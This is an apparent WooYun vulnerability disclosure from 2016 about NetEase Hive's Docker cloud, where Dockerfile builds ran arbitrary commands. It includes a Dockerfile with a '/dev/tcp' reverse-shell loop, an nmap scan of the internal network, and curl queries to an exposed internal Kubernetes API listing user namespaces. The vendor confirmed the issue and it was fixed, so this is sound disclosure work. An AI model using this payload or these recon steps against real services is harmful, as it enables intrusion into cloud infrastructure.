当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168160

漏洞标题:公有云安全之网易蜂巢docker云服务设计不当导致一些内部API泄露

相关厂商:网易

漏洞作者: boooooom

提交时间:2016-01-07 21:03

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-07: 细节已通知厂商并且等待厂商处理中
2016-01-11: 厂商已经确认,细节仅向厂商公开
2016-01-21: 细节向核心白帽子及相关领域专家公开
2016-01-31: 细节向普通白帽子公开
2016-02-10: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

网易蜂巢挺不错的,帮你们测试一下哇,为了帮你们测试已欠费5毛;看起来感觉挺好用的啊。
据说为开发者打造的基于Docker的容器云,全SSD助力极速打造云端应用!

详细说明:

1.创建镜像这个地方支持使用dockfile进行构建
https://c.163.com/dashboard#/m/repo/create/
那么我们知道dockfile是可以执行任意命令的
2.利用dockfile构建时执行任意命令,可shell

# Memcached
#
# VERSION       2.2
# use the ubuntu base image provided by dotCloud
FROM ubuntu
MAINTAINER Victor Coisne [email protected]
RUN sleep 1
RUN cat /etc/passwd
# make sure the package repository is up to date
RUN echo "deb http://mirrors.163.com/ubuntu/ precise main restricted universe multiverse" > /etc/apt/sources.list
RUN apt-get update
RUN echo "while ((1));do sleep 1;echo 111;/bin/sh -i >& /dev/tcp/1.1.1.1/1234 0>&1;done" >> /tmp/1.sh
RUN bash /tmp/1.sh
RUN sleep 20
# install memcached
RUN apt-get install -y memcached
# Launch memcached when launching the container
ENTRYPOINT ["memcached"]
# run memcached as the daemon user
USER daemon
# expose memcached port
EXPOSE 11211


3.通过反弹shell获取其中一台构建服务器的权限,然后对172网段进行了一下探测,发现

172.17.42.1
Starting Nmap 5.21 ( http://nmap.org ) at 2016-01-07 15:36 UTC
Nmap scan report for 172.17.42.1
Host is up (0.000013s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
1046/tcp open  unknown
6000/tcp open  X11
7001/tcp open  afs3-callback
8010/tcp open  xmpp
8011/tcp open  unknown
8081/tcp open  blackice-icecap
8181/tcp open  unknown
9091/tcp open  unknown


通过分析172.17.42.1就是蜂巢的官网,而172.17.42.1:8081是内部api

# curl 172.17.42.1:8081
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   202  100   202    0     0   211k      0 --:--:-- --:--:-- --:--:--  197k
{
  "paths": [
    "/api",
    "/api/v1",
    "/healthz",
    "/healthz/ping",
    "/logs/",
    "/metrics",
    "/resetMetrics",
    "/swagger-ui/",
    "/swaggerapi/",
    "/ui/",
    "/version"
  ]
}#


通过这个接口大概能看到有1522个uid的信息

# curl 172.17.42.1:8081/api/v1/namespaces|grep uid|sort|uniq |wc -l
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  793k    0  793k    0     0  6053k      0 --:--:-- --:--:-- --:--:-- 6100k
1522


# curl 172.17.42.1:8081/api/v1/namespaces
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0{
  "kind": "NamespaceList",
  "apiVersion": "v1",
  "metadata": {
    "selfLink": "/api/v1/namespaces",
    "resourceVersion": "135465264"
  },
  "items": [
    {
      "metadata": {
        "name": "0007c326cb3241ad8046f332d49f8994",
        "selfLink": "/api/v1/namespaces/0007c326cb3241ad8046f332d49f8994",
        "uid": "a693f499-b41a-11e5-a8e3-ecf4bbd96674",
        "resourceVersion": "127645252",
        "creationTimestamp": "2016-01-06T02:10:26Z",
        "labels": {
          "name": "0007c326cb3241ad8046f332d49f8994"
        }
      },
      "spec": {
        "finalizers": [
          "kubernetes"
        ]
      },


其他的一些接口就没有仔细测了

漏洞证明:

c.163.1.png


c.163.4.png

修复方案:

自有服务的api需要和用户环境隔离

版权声明:转载请注明来源 boooooom@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2016-01-11 09:59

厂商回复:

该漏洞已提交修复,白帽子漏洞利用描述清楚,感谢您对网易的支持!

最新状态:

暂无